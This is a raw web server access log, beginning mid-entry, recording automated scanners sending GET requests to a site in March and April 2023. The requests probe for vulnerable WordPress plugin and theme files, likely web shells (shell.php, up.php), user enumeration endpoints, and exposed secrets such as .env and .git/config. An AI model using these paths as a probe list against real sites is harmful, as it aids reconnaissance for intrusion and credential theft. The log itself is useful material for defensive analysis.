AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [21/Mar/2023:18:40:03 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:08:12:11 +0700] "GET /wp-content/themes/classic/rtl.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:08:12:46 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:08:13:58 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:08:14:20 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:08:15:08 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:08:15:19 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:12:38:34 +0700] "GET /wp-content/themes/classic/rtl.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:12:38:40 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:12:38:56 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:12:39:08 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:12:39:14 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 65.109.140.150 - - [22/Mar/2023:12:39:19 +0700] "GET /wp-content/plugins/core-stab/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 95.216.164.140 - - [22/Mar/2023:19:58:24 +0700] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [22/Mar/2023:19:58:33 +0700] "GET /ccx/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [22/Mar/2023:19:58:36 +0700] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [22/Mar/2023:19:58:41 +0700] "GET /wp-content/themes/ccx/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [23/Mar/2023:00:47:58 +0700] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [23/Mar/2023:00:48:04 +0700] "GET /marijuana.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [23/Mar/2023:00:48:12 +0700] "GET /up.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 95.216.164.140 - - [23/Mar/2023:00:48:18 +0700] "GET /shell.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 178.128.82.148 - - [24/Mar/2023:13:14:26 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 178.128.82.148 - - [24/Mar/2023:13:14:30 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 178.128.82.148 - - [24/Mar/2023:13:14:32 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 167.94.138.51 - - [25/Mar/2023:06:11:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.191 - - [25/Mar/2023:23:09:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 107.180.68.247 - - [26/Mar/2023:02:33:13 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 107.180.68.247 - - [26/Mar/2023:02:33:18 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 107.180.68.247 - - [26/Mar/2023:02:33:21 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 35.88.121.122 - - [28/Mar/2023:11:42:06 +0700] "GET /.well-known/acme-challenge/UTSFdDFiOhyE48FXmIA_mS2wj1RepT7f9o0p4ms0CLY HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 23.178.112.202 - - [28/Mar/2023:11:42:06 +0700] "GET /.well-known/acme-challenge/UTSFdDFiOhyE48FXmIA_mS2wj1RepT7f9o0p4ms0CLY HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.144.163.155 - - [28/Mar/2023:11:42:06 +0700] "GET /.well-known/acme-challenge/UTSFdDFiOhyE48FXmIA_mS2wj1RepT7f9o0p4ms0CLY HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 51.81.167.146 - - [28/Mar/2023:11:42:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 137.184.106.30 - - [28/Mar/2023:11:42:59 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084446) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /s/434323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /info.php HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /api/search?folderIds=0 HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 137.184.106.30 - - [28/Mar/2023:11:43:00 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 65.154.226.168 - - [28/Mar/2023:11:44:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/111.0.5563.64 Safari/537.36" 205.169.39.241 - - [28/Mar/2023:11:45:05 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.241 - - [28/Mar/2023:11:45:21 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 51.81.167.146 - - [28/Mar/2023:12:57:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 66.115.189.229 - - [28/Mar/2023:13:11:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 87.236.176.68 - - [29/Mar/2023:04:27:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 147.78.47.249 - - [29/Mar/2023:22:01:16 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/Mar/2023:22:01:19 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/Mar/2023:22:01:22 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [29/Mar/2023:22:01:26 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 167.248.133.36 - - [31/Mar/2023:02:17:16 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 89.116.26.152 - - [31/Mar/2023:04:35:06 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 89.116.26.152 - - [31/Mar/2023:04:35:09 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 89.116.26.152 - - [31/Mar/2023:04:35:12 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 3.0.43.82 - - [03/Apr/2023:05:17:30 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 3.0.43.82 - - [03/Apr/2023:05:17:32 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 3.0.43.82 - - [03/Apr/2023:05:17:33 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 5.78.103.129 - - [06/Apr/2023:06:23:29 +0700] "GET /wp-content/plugins/zendrop-dropshipping-and-fulfillment/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:23:31 +0700] "GET /complete-order/?selected_package=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:23:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:42 +0700] "GET /wp-content/plugins/n-media-woocommerce-checkout-fields/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:45 +0700] "GET /wp-content/plugins/videowhisper-live-streaming-integration/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:48 +0700] "GET /wp-content/plugins/js-support-ticket/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:51 +0700] "GET /wp-content/themes/statfort-new/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:52 +0700] "GET /wp-content/themes/faith-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.57 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:54 +0700] "GET /wp-content/themes/soccer-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:56 +0700] "GET /wp-content/themes/churchlife/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:23:58 +0700] "GET /wp-content/themes/onelife/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:00 +0700] "GET /wp-content/themes/snapture/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:03 +0700] "GET /wp-content/themes/theme-deejay/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:06 +0700] "GET /wp-content/themes/bolster-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:08 +0700] "GET /wp-content/themes/rocky-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:09 +0700] "GET /wp-content/themes/bolster/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:11 +0700] "GET /wp-content/themes/soundblast/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:14 +0700] "GET /wp-content/themes/spikes-black/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:17 +0700] "GET /wp-content/themes/spikes/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:21 +0700] "GET /wp-content/themes/kingclub-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:22 +0700] "GET /wp-content/themes/club-theme/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:24 +0700] "GET /wp-content/themes/statfort/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:26 +0700] "GET /wp-content/themes/aidreform/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:28 +0700] "GET /wp-content/themes/footysquare/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:29 +0700] "GET /wp-content/themes/westand/include/lang_upload.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:31 +0700] "GET /wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:24:33 +0700] "GET /wp-content/plugins/yith-woocommerce-gift-cards-premium/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:24:36 +0700] "GET /wp-content/plugins/membership-for-woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:39 +0700] "GET /wp-content/plugins/wp-upg/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:41 +0700] "GET /wp-content/plugins/booking-calendar/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:42 +0700] "GET /wp-content/plugins/woo-refund-and-exchange-lite/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:44 +0700] "GET /wp-content/plugins/armember/js/arm_widgets_js.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:47 +0700] "GET /wp-content/plugins/armember/documentation/index.html HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:49 +0700] "GET /wp-content/plugins/jobboardwp/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:54 +0700] "GET /wp-content/themes/listingo/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:55 +0700] "GET /wp-content/themes/listingo/js/listingo_callbacks.js HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:24:59 +0700] "GET /wp-content/themes/greyd_suite/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:00 +0700] "GET /wp-content/plugins/alphabetic-pagination/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/111.0.5563.72 Mobile/15E148 Safari/604.1" 5.78.103.129 - - [06/Apr/2023:06:25:06 +0700] "GET /wp-content/plugins/scripts-organizer/plugins/meta-box/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:08 +0700] "GET /wp-content/themes/workreap/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:09 +0700] "GET /wp-content/themes/workreap/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:11 +0700] "GET /wp-content/plugins/wpgateway/css/style.css HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:13 +0700] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Mobile Safari/537.36" 5.78.103.129 - - [06/Apr/2023:06:25:15 +0700] "GET /wp-content/plugins/ninja-forms/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 12; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) 